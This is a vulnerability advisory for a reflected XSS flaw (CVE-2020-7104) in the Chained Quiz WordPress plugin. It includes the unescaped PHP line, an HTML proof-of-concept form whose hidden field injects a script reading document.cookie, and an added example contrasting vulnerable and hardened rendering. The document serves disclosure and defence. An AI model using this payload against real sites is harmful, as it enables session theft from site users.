Chained Quiz < 1.1.8.2 - Unauthenticated Reflected XSS

Description

The WordPress plugin Chained Quiz before version 1.1.8.2 suffers from a reflected XSS vulnerability in the 'total_questions' POST parameter, which is submitted when a user completes a quiz.

The code in question takes the 'total_questions' parameter straight from the request and writes it into the HTML response without escaping HTML special characters:

models/quiz.php

$output = str_replace('{{questions}}', $_POST['total_questions'], $output);
Proof of Concept
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="answer" value="x&#32;" />
      <input type="hidden" name="question&#95;id" value="1" />
      <input type="hidden" name="quiz&#95;id" value="1" />
      <input type="hidden" name="post&#95;id" value="5" />
      <input type="hidden" name="question&#95;type" value="radio" />
      <input type="hidden" name="points" value="0" />
      <input type="hidden" name="action" value="chainedquiz&#95;ajax" />
      <input type="hidden" name="chainedquiz&#95;action" value="answer" />
      <input type="hidden" name="total&#95;questions" value="1v4918&lt;script&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;eyjfw" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
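To show the defect and its remedy side by side, the following is an added PHP example; it is not the plugin's code and not the vendor's changeset. It reproduces the str_replace pattern from models/quiz.php in one function and, in a second, treats total_questions as the integer it is meant to be and escapes it before it reaches the page. The function names, the template fragment and the two request arrays (one benign, one modelled on the PoC payload) are constructed for illustration.

```php
<?php
// Added example, not the plugin's code. The template string and the request
// arrays below are constructed; function names are invented for illustration.

// Vulnerable pattern as described in the advisory: the raw POST value is
// interpolated into HTML that is returned to the browser unchanged.
function render_vulnerable(array $post, string $template): string
{
    return str_replace('{{questions}}', $post['total_questions'], $template);
}

// Hardened variant (assumption: total_questions is a question count, so a
// strict non-negative integer check is the tightest filter; in a WordPress
// context esc_html() would be the helper of choice for free-text values).
function render_hardened(array $post, string $template): string
{
    $raw = (string) ($post['total_questions'] ?? '');

    // Reject anything that is not a plain decimal integer.
    if (!preg_match('/^\d+$/', $raw)) {
        $raw = '0';
    }

    // Escape before output as defence in depth: even a validated value should
    // never be written into HTML without context-appropriate encoding.
    $safe = htmlspecialchars((string) (int) $raw, ENT_QUOTES, 'UTF-8');
    return str_replace('{{questions}}', $safe, $template);
}

// Constructed sample data: a response fragment and two request bodies.
$template = '<p>You answered {{questions}} questions.</p>';
$benign   = ['total_questions' => '4'];
$hostile  = ['total_questions' => '1<script>alert(document.cookie)</script>'];

// Vulnerable renderer: the benign value is fine, the hostile one lands in the
// page as live markup.
echo render_vulnerable($benign, $template), PHP_EOL;
echo render_vulnerable($hostile, $template), PHP_EOL;

// Hardened renderer: the benign value passes, the hostile one is replaced by
// the fallback count and the script tag never reaches the response.
echo render_hardened($benign, $template), PHP_EOL;
echo render_hardened($hostile, $template), PHP_EOL;
```

Run it with `php example.php` to see both outputs. The hardened version applies two independent controls, an input type check and output encoding, so that a mistake in one does not reopen the reflection; a code review looking for this bug class should flag any `$_POST`, `$_GET` or `$_REQUEST` value that reaches `str_replace`, `echo` or string concatenation into HTML without passing through a validator or an escaping function first.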

Affects Plugin

Fixed in version 1.1.8.2

References

CVE 2020-7104
URL https://plugins.trac.wordpress.org/changeset/2228538
URL https://spider-security.co.uk/blog-cve-2020-7104

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ben Armstrong
Submitter Ben Armstrong
Submitter Website https://spider-security.co.uk
Views 3497
Verified No
WPVDB ID 10029

Timeline

Publicly Published 2020-01-16
Added 2020-01-16
Last Updated 2020-01-23
